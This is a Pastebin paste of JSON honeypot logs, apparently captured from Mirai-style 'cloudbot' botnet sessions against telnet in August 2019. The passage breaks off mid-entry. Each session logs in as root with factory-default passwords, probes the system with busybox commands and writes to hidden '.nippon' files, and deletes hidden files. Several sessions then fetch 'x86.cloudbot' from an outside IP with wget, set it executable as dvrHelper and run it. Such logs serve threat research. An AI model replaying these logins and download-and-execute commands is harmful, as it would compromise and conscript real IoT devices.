SHARE
TWEET

cloudbot/AirDropBot @0xrb

a guest Sep 30th, 2019 74 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. {
 2.     "datas": [],
 3.     "inputs": {
 4.         "2c08de6f5477": [
 5.             {
 6.                 "eventid": "command.input",
 7.                 "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
 8.                 "timestamp": "2019-08-06T17:32:46.672Z"
 9.             },
 10.             {
 11.                 "eventid": "command.input",
 12.                 "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
 13.                 "timestamp": "2019-08-06T17:32:46.399Z"
 14.             },
 15.             {
 16.                 "eventid": "command.input",
 17.                 "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
 18.                 "timestamp": "2019-08-06T17:32:41.469Z"
 19.             },
 20.             {
 21.                 "eventid": "command.input",
 22.                 "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
 23.                 "timestamp": "2019-08-06T17:32:41.199Z"
 24.             },
 25.             {
 26.                 "eventid": "command.input",
 27.                 "input": "/bin/busybox ECCHI",
 28.                 "timestamp": "2019-08-06T17:32:40.927Z"
 29.             },
 30.             {
 31.                 "eventid": "command.input",
 32.                 "input": "/bin/busybox cat /bin/echo",
 33.                 "timestamp": "2019-08-06T17:32:40.642Z"
 34.             },
 35.             {
 36.                 "eventid": "command.input",
 37.                 "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
 38.                 "timestamp": "2019-08-06T17:32:40.364Z"
 39.             },
 40.             {
 41.                 "eventid": "command.input",
 42.                 "input": "cd /",
 43.                 "timestamp": "2019-08-06T17:32:40.363Z"
 44.             },
 45.             {
 46.                 "eventid": "command.input",
 47.                 "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
 48.                 "timestamp": "2019-08-06T17:32:40.361Z"
 49.             },
 50.             {
 51.                 "eventid": "command.input",
 52.                 "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
 53.                 "timestamp": "2019-08-06T17:32:40.356Z"
 54.             },
 55.             {
 56.                 "eventid": "command.input",
 57.                 "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
 58.                 "timestamp": "2019-08-06T17:32:40.353Z"
 59.             },
 60.             {
 61.                 "eventid": "command.input",
 62.                 "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
 63.                 "timestamp": "2019-08-06T17:32:40.35Z"
 64.             },
 65.             {
 66.                 "eventid": "command.input",
 67.                 "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
 68.                 "timestamp": "2019-08-06T17:32:40.347Z"
 69.             },
 70.             {
 71.                 "eventid": "command.input",
 72.                 "input": "rm /.t; rm /.sh; rm /.human",
 73.                 "timestamp": "2019-08-06T17:32:40.345Z"
 74.             },
 75.             {
 76.                 "eventid": "command.input",
 77.                 "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
 78.                 "timestamp": "2019-08-06T17:32:40.34Z"
 79.             },
 80.             {
 81.                 "eventid": "command.input",
 82.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
 83.                 "timestamp": "2019-08-06T17:32:39.689Z"
 84.             },
 85.             {
 86.                 "eventid": "command.input",
 87.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
 88.                 "timestamp": "2019-08-06T17:32:39.684Z"
 89.             },
 90.             {
 91.                 "eventid": "command.input",
 92.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
 93.                 "timestamp": "2019-08-06T17:32:39.677Z"
 94.             },
 95.             {
 96.                 "eventid": "command.input",
 97.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
 98.                 "timestamp": "2019-08-06T17:32:39.671Z"
 99.             },
 100.             {
 101.                 "eventid": "command.input",
 102.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
 103.                 "timestamp": "2019-08-06T17:32:39.461Z"
 104.             }
 105.         ],
 106.         "33837076c101": [
 107.             {
 108.                 "eventid": "command.input",
 109.                 "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
 110.                 "timestamp": "2019-08-06T17:34:02.945Z"
 111.             },
 112.             {
 113.                 "eventid": "command.input",
 114.                 "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
 115.                 "timestamp": "2019-08-06T17:34:02.742Z"
 116.             },
 117.             {
 118.                 "eventid": "command.input",
 119.                 "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
 120.                 "timestamp": "2019-08-06T17:34:00.825Z"
 121.             },
 122.             {
 123.                 "eventid": "command.input",
 124.                 "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
 125.                 "timestamp": "2019-08-06T17:34:00.622Z"
 126.             },
 127.             {
 128.                 "eventid": "command.input",
 129.                 "input": "/bin/busybox ECCHI",
 130.                 "timestamp": "2019-08-06T17:34:00.386Z"
 131.             },
 132.             {
 133.                 "eventid": "command.input",
 134.                 "input": "/bin/busybox cat /bin/echo",
 135.                 "timestamp": "2019-08-06T17:34:00.161Z"
 136.             },
 137.             {
 138.                 "eventid": "command.input",
 139.                 "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
 140.                 "timestamp": "2019-08-06T17:33:59.737Z"
 141.             },
 142.             {
 143.                 "eventid": "command.input",
 144.                 "input": "cd /",
 145.                 "timestamp": "2019-08-06T17:33:59.735Z"
 146.             },
 147.             {
 148.                 "eventid": "command.input",
 149.                 "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
 150.                 "timestamp": "2019-08-06T17:33:59.732Z"
 151.             },
 152.             {
 153.                 "eventid": "command.input",
 154.                 "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
 155.                 "timestamp": "2019-08-06T17:33:59.725Z"
 156.             },
 157.             {
 158.                 "eventid": "command.input",
 159.                 "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
 160.                 "timestamp": "2019-08-06T17:33:59.722Z"
 161.             },
 162.             {
 163.                 "eventid": "command.input",
 164.                 "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
 165.                 "timestamp": "2019-08-06T17:33:59.719Z"
 166.             },
 167.             {
 168.                 "eventid": "command.input",
 169.                 "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
 170.                 "timestamp": "2019-08-06T17:33:59.716Z"
 171.             },
 172.             {
 173.                 "eventid": "command.input",
 174.                 "input": "rm /.t; rm /.sh; rm /.human",
 175.                 "timestamp": "2019-08-06T17:33:59.712Z"
 176.             },
 177.             {
 178.                 "eventid": "command.input",
 179.                 "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
 180.                 "timestamp": "2019-08-06T17:33:59.706Z"
 181.             },
 182.             {
 183.                 "eventid": "command.input",
 184.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
 185.                 "timestamp": "2019-08-06T17:33:58.538Z"
 186.             },
 187.             {
 188.                 "eventid": "command.input",
 189.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
 190.                 "timestamp": "2019-08-06T17:33:58.531Z"
 191.             },
 192.             {
 193.                 "eventid": "command.input",
 194.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
 195.                 "timestamp": "2019-08-06T17:33:58.523Z"
 196.             },
 197.             {
 198.                 "eventid": "command.input",
 199.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
 200.                 "timestamp": "2019-08-06T17:33:58.515Z"
 201.             },
 202.             {
 203.                 "eventid": "command.input",
 204.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
 205.                 "timestamp": "2019-08-06T17:33:58.38Z"
 206.             },
 207.             {
 208.                 "eventid": "command.input",
 209.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
 210.                 "timestamp": "2019-08-06T17:33:58.365Z"
 211.             },
 212.             {
 213.                 "eventid": "command.input",
 214.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
 215.                 "timestamp": "2019-08-06T17:33:58.357Z"
 216.             },
 217.             {
 218.                 "eventid": "command.input",
 219.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
 220.                 "timestamp": "2019-08-06T17:33:58.351Z"
 221.             },
 222.             {
 223.                 "eventid": "command.input",
 224.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
 225.                 "timestamp": "2019-08-06T17:33:58.344Z"
 226.             },
 227.             {
 228.                 "eventid": "command.input",
 229.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
 230.                 "timestamp": "2019-08-06T17:33:58.337Z"
 231.             },
 232.             {
 233.                 "eventid": "command.input",
 234.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
 235.                 "timestamp": "2019-08-06T17:33:58.322Z"
 236.             },
 237.             {
 238.                 "eventid": "command.input",
 239.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
 240.                 "timestamp": "2019-08-06T17:33:58.315Z"
 241.             },
 242.             {
 243.                 "eventid": "command.input",
 244.                 "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
 245.                 "timestamp": "2019-08-06T17:33:57.634Z"
 246.             },
 247.             {
 248.                 "eventid": "command.input",
 249.                 "input": "/bin/busybox ps; /bin/busybox ECCHI",
 250.                 "timestamp": "2019-08-06T17:33:57.425Z"
 251.             },
 252.             {
 253.                 "eventid": "command.input",
 254.                 "input": "bash",
 255.                 "timestamp": "2019-08-06T17:33:56.465Z"
 256.             },
 257.             {
 258.                 "eventid": "command.input",
 259.                 "input": "terminal",
 260.                 "timestamp": "2019-08-06T17:33:56.463Z"
 261.             },
 262.             {
 263.                 "eventid": "command.input",
 264.                 "input": "linuxshell",
 265.                 "timestamp": "2019-08-06T17:33:56.461Z"
 266.             },
 267.             {
 268.                 "eventid": "command.input",
 269.                 "input": "sh",
 270.                 "timestamp": "2019-08-06T17:33:56.459Z"
 271.             },
 272.             {
 273.                 "eventid": "command.input",
 274.                 "input": "shell",
 275.                 "timestamp": "2019-08-06T17:33:56.455Z"
 276.             },
 277.             {
 278.                 "eventid": "command.input",
 279.                 "input": "enable",
 280.                 "timestamp": "2019-08-06T17:33:56.244Z"
 281.             },
 282.             {
 283.                 "eventid": "login.success",
 284.                 "geoip": {
 285.                     "city_name": "",
 286.                     "country_name": "Netherlands"
 287.                 },
 288.                 "password": "t0talc0ntr0l4!",
 289.                 "timestamp": "2019-08-06T17:33:55.628Z",
 290.                 "username": "root"
 291.             }
 292.         ],
 293.         "8f610699f8d2": [
 294.             {
 295.                 "eventid": "command.input",
 296.                 "input": "/bin/busybox ECCHI",
 297.                 "timestamp": "2019-08-06T17:33:26.74Z"
 298.             },
 299.             {
 300.                 "eventid": "command.input",
 301.                 "input": "/bin/busybox cat /bin/echo",
 302.                 "timestamp": "2019-08-06T17:33:26.437Z"
 303.             },
 304.             {
 305.                 "eventid": "command.input",
 306.                 "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
 307.                 "timestamp": "2019-08-06T17:33:26.288Z"
 308.             },
 309.             {
 310.                 "eventid": "command.input",
 311.                 "input": "cd /",
 312.                 "timestamp": "2019-08-06T17:33:26.286Z"
 313.             },
 314.             {
 315.                 "eventid": "command.input",
 316.                 "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
 317.                 "timestamp": "2019-08-06T17:33:26.28Z"
 318.             },
 319.             {
 320.                 "eventid": "command.input",
 321.                 "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
 322.                 "timestamp": "2019-08-06T17:33:26.271Z"
 323.             },
 324.             {
 325.                 "eventid": "command.input",
 326.                 "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
 327.                 "timestamp": "2019-08-06T17:33:26.266Z"
 328.             },
 329.             {
 330.                 "eventid": "command.input",
 331.                 "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
 332.                 "timestamp": "2019-08-06T17:33:26.26Z"
 333.             },
 334.             {
 335.                 "eventid": "command.input",
 336.                 "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
 337.                 "timestamp": "2019-08-06T17:33:26.257Z"
 338.             },
 339.             {
 340.                 "eventid": "command.input",
 341.                 "input": "rm /.t; rm /.sh; rm /.human",
 342.                 "timestamp": "2019-08-06T17:33:26.249Z"
 343.             },
 344.             {
 345.                 "eventid": "command.input",
 346.                 "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
 347.                 "timestamp": "2019-08-06T17:33:26.241Z"
 348.             },
 349.             {
 350.                 "eventid": "command.input",
 351.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
 352.                 "timestamp": "2019-08-06T17:33:25.931Z"
 353.             },
 354.             {
 355.                 "eventid": "command.input",
 356.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
 357.                 "timestamp": "2019-08-06T17:33:25.922Z"
 358.             },
 359.             {
 360.                 "eventid": "command.input",
 361.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
 362.                 "timestamp": "2019-08-06T17:33:25.908Z"
 363.             },
 364.             {
 365.                 "eventid": "command.input",
 366.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
 367.                 "timestamp": "2019-08-06T17:33:25.897Z"
 368.             },
 369.             {
 370.                 "eventid": "command.input",
 371.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
 372.                 "timestamp": "2019-08-06T17:33:25.725Z"
 373.             },
 374.             {
 375.                 "eventid": "command.input",
 376.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
 377.                 "timestamp": "2019-08-06T17:33:25.697Z"
 378.             },
 379.             {
 380.                 "eventid": "command.input",
 381.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
 382.                 "timestamp": "2019-08-06T17:33:25.686Z"
 383.             },
 384.             {
 385.                 "eventid": "command.input",
 386.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
 387.                 "timestamp": "2019-08-06T17:33:25.675Z"
 388.             },
 389.             {
 390.                 "eventid": "command.input",
 391.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
 392.                 "timestamp": "2019-08-06T17:33:25.665Z"
 393.             },
 394.             {
 395.                 "eventid": "command.input",
 396.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
 397.                 "timestamp": "2019-08-06T17:33:25.65Z"
 398.             },
 399.             {
 400.                 "eventid": "command.input",
 401.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
 402.                 "timestamp": "2019-08-06T17:33:25.629Z"
 403.             },
 404.             {
 405.                 "eventid": "command.input",
 406.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
 407.                 "timestamp": "2019-08-06T17:33:25.616Z"
 408.             },
 409.             {
 410.                 "eventid": "command.input",
 411.                 "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
 412.                 "timestamp": "2019-08-06T17:33:25.456Z"
 413.             },
 414.             {
 415.                 "eventid": "command.input",
 416.                 "input": "/bin/busybox ps; /bin/busybox ECCHI",
 417.                 "timestamp": "2019-08-06T17:33:25.301Z"
 418.             },
 419.             {
 420.                 "eventid": "command.input",
 421.                 "input": "bash",
 422.                 "timestamp": "2019-08-06T17:33:24.959Z"
 423.             },
 424.             {
 425.                 "eventid": "command.input",
 426.                 "input": "terminal",
 427.                 "timestamp": "2019-08-06T17:33:24.958Z"
 428.             },
 429.             {
 430.                 "eventid": "command.input",
 431.                 "input": "linuxshell",
 432.                 "timestamp": "2019-08-06T17:33:24.951Z"
 433.             },
 434.             {
 435.                 "eventid": "command.input",
 436.                 "input": "sh",
 437.                 "timestamp": "2019-08-06T17:33:24.95Z"
 438.             },
 439.             {
 440.                 "eventid": "command.input",
 441.                 "input": "shell",
 442.                 "timestamp": "2019-08-06T17:33:24.948Z"
 443.             },
 444.             {
 445.                 "eventid": "command.input",
 446.                 "input": "enable",
 447.                 "timestamp": "2019-08-06T17:33:24.779Z"
 448.             },
 449.             {
 450.                 "eventid": "login.success",
 451.                 "geoip": {
 452.                     "city_name": "",
 453.                     "country_name": "Netherlands"
 454.                 },
 455.                 "password": "t0talc0ntr0l4!",
 456.                 "timestamp": "2019-08-06T17:33:23.629Z",
 457.                 "username": "root"
 458.             }
 459.         ],
 460.         "c3aee80c84a8": [
 461.             {
 462.                 "eventid": "command.input",
 463.                 "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
 464.                 "timestamp": "2019-08-06T17:34:43.292Z"
 465.             },
 466.             {
 467.                 "eventid": "command.input",
 468.                 "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
 469.                 "timestamp": "2019-08-06T17:34:43.014Z"
 470.             },
 471.             {
 472.                 "eventid": "command.input",
 473.                 "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
 474.                 "timestamp": "2019-08-06T17:33:54.963Z"
 475.             },
 476.             {
 477.                 "eventid": "command.input",
 478.                 "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
 479.                 "timestamp": "2019-08-06T17:33:54.681Z"
 480.             },
 481.             {
 482.                 "eventid": "command.input",
 483.                 "input": "/bin/busybox ECCHI",
 484.                 "timestamp": "2019-08-06T17:33:53.801Z"
 485.             },
 486.             {
 487.                 "eventid": "command.input",
 488.                 "input": "/bin/busybox cat /bin/echo",
 489.                 "timestamp": "2019-08-06T17:33:52.543Z"
 490.             },
 491.             {
 492.                 "eventid": "command.input",
 493.                 "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
 494.                 "timestamp": "2019-08-06T17:33:52.254Z"
 495.             },
 496.             {
 497.                 "eventid": "command.input",
 498.                 "input": "cd /",
 499.                 "timestamp": "2019-08-06T17:33:52.252Z"
 500.             },
 501.             {
 502.                 "eventid": "command.input",
 503.                 "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
 504.                 "timestamp": "2019-08-06T17:33:52.25Z"
 505.             },
 506.             {
 507.                 "eventid": "command.input",
 508.                 "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
 509.                 "timestamp": "2019-08-06T17:33:52.245Z"
 510.             },
 511.             {
 512.                 "eventid": "command.input",
 513.                 "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
 514.                 "timestamp": "2019-08-06T17:33:52.242Z"
 515.             },
 516.             {
 517.                 "eventid": "command.input",
 518.                 "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
 519.                 "timestamp": "2019-08-06T17:33:52.24Z"
 520.             },
 521.             {
 522.                 "eventid": "command.input",
 523.                 "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
 524.                 "timestamp": "2019-08-06T17:33:52.237Z"
 525.             },
 526.             {
 527.                 "eventid": "command.input",
 528.                 "input": "rm /.t; rm /.sh; rm /.human",
 529.                 "timestamp": "2019-08-06T17:33:52.235Z"
 530.             },
 531.             {
 532.                 "eventid": "command.input",
 533.                 "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
 534.                 "timestamp": "2019-08-06T17:33:52.23Z"
 535.             },
 536.             {
 537.                 "eventid": "command.input",
 538.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
 539.                 "timestamp": "2019-08-06T17:33:51.627Z"
 540.             },
 541.             {
 542.                 "eventid": "command.input",
 543.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
 544.                 "timestamp": "2019-08-06T17:33:51.622Z"
 545.             },
 546.             {
 547.                 "eventid": "command.input",
 548.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
 549.                 "timestamp": "2019-08-06T17:33:51.615Z"
 550.             },
 551.             {
 552.                 "eventid": "command.input",
 553.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
 554.                 "timestamp": "2019-08-06T17:33:51.609Z"
 555.             },
 556.             {
 557.                 "eventid": "command.input",
 558.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
 559.                 "timestamp": "2019-08-06T17:33:51.367Z"
 560.             },
 561.             {
 562.                 "eventid": "command.input",
 563.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
 564.                 "timestamp": "2019-08-06T17:33:51.355Z"
 565.             },
 566.             {
 567.                 "eventid": "command.input",
 568.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
 569.                 "timestamp": "2019-08-06T17:33:51.35Z"
 570.             },
 571.             {
 572.                 "eventid": "command.input",
 573.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
 574.                 "timestamp": "2019-08-06T17:33:51.345Z"
 575.             },
 576.             {
 577.                 "eventid": "command.input",
 578.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
 579.                 "timestamp": "2019-08-06T17:33:51.34Z"
 580.             },
 581.             {
 582.                 "eventid": "command.input",
 583.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
 584.                 "timestamp": "2019-08-06T17:33:51.335Z"
 585.             },
 586.             {
 587.                 "eventid": "command.input",
 588.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
 589.                 "timestamp": "2019-08-06T17:33:51.324Z"
 590.             },
 591.             {
 592.                 "eventid": "command.input",
 593.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
 594.                 "timestamp": "2019-08-06T17:33:51.319Z"
 595.             },
 596.             {
 597.                 "eventid": "command.input",
 598.                 "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
 599.                 "timestamp": "2019-08-06T17:33:46.938Z"
 600.             },
 601.             {
 602.                 "eventid": "command.input",
 603.                 "input": "/bin/busybox ps; /bin/busybox ECCHI",
 604.                 "timestamp": "2019-08-06T17:33:46.039Z"
 605.             },
 606.             {
 607.                 "eventid": "command.input",
 608.                 "input": "bash",
 609.                 "timestamp": "2019-08-06T17:33:44.818Z"
 610.             },
 611.             {
 612.                 "eventid": "command.input",
 613.                 "input": "terminal",
 614.                 "timestamp": "2019-08-06T17:33:44.816Z"
 615.             },
 616.             {
 617.                 "eventid": "command.input",
 618.                 "input": "linuxshell",
 619.                 "timestamp": "2019-08-06T17:33:44.814Z"
 620.             },
 621.             {
 622.                 "eventid": "command.input",
 623.                 "input": "sh",
 624.                 "timestamp": "2019-08-06T17:33:44.813Z"
 625.             },
 626.             {
 627.                 "eventid": "command.input",
 628.                 "input": "shell",
 629.                 "timestamp": "2019-08-06T17:33:44.811Z"
 630.             },
 631.             {
 632.                 "eventid": "command.input",
 633.                 "input": "enable",
 634.                 "timestamp": "2019-08-06T17:33:44.526Z"
 635.             },
 636.             {
 637.                 "eventid": "login.success",
 638.                 "geoip": {
 639.                     "city_name": "",
 640.                     "country_name": "Netherlands"
 641.                 },
 642.                 "password": "vizxv",
 643.                 "timestamp": "2019-08-06T17:33:43.696Z",
 644.                 "username": "root"
 645.             }
 646.         ],
 647.         "e551f86e07d6": [
 648.             {
 649.                 "eventid": "command.input",
 650.                 "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
 651.                 "timestamp": "2019-08-06T17:34:33.79Z"
 652.             },
 653.             {
 654.                 "eventid": "command.input",
 655.                 "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
 656.                 "timestamp": "2019-08-06T17:34:33.55Z"
 657.             },
 658.             {
 659.                 "eventid": "command.input",
 660.                 "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
 661.                 "timestamp": "2019-08-06T17:34:27.41Z"
 662.             },
 663.             {
 664.                 "eventid": "command.input",
